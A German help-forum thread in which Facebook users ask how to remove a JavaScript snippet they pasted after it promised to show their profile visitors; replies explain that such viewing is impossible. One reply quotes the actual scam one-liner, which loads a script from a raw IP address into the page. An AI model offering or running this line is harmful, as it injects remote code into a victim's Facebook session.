Frage von Art957,

JavaScript entfernen,aber wie?

Hallo Leute,

ich habe eine kurze Frage:

Und zwar habe ich heute bei facebook ein Javascript in die Eingabezeile eingefügt,dieses hatte die Aufgabe mir meine Besucher von meiner Seite zu zeigen.Leider hat sich sich rausgestellt,dass dass ne Viruskette ist,da mein Antivir mir jetzt viele Meldungen schickt.

Und nun zu meiner eigentlichen Frage:

Wie entferne ich dieses Script aus dem Brwoser?

Hilfreichste Antwort von MEGACHELTERRAR,
2 Mitglieder fanden diese Antwort hilfreich

Also, JavaScript ist so schonmal nicht serverseitig, d.h u.a., dass das, was du da eingibst, soweit das manuell möglich ist, nur für den aktuellen Seitenaufruf zählt.

 

Wäre es denn möglich dieses Script mal hier zu posten oder mal einen Artikel oder so zu nennen, welcher über diesen Script ist?

 

Wie lang ist denn der Script? Weil ein Script allein, kann eigentlich normalerweise kein Virus sein...

Antwort von Daquest,

So, Tag auch , habe ganz genau das gleiche problem und bitte ebenfalls um hilfe und PS: hier der script möchte nämlich auch wissen wie man dieses blöde script entefernt:

javascript:(a=(b=document).createElement('script')).src='//216.119.153.147/german2.php?'+Math.random(),b.body.appendChild(a);void(0)

Kommentar von MEGACHELTERRAR,

Achja, na gucke mal hier. Das ist schon nicht schön. Vor allem sollte man sich merken: Man kann bisher nicht auf Facebook sehen, wer auf der eigenen Seite war!

Keine passende Antwort gefunden?

Fragen Sie die Community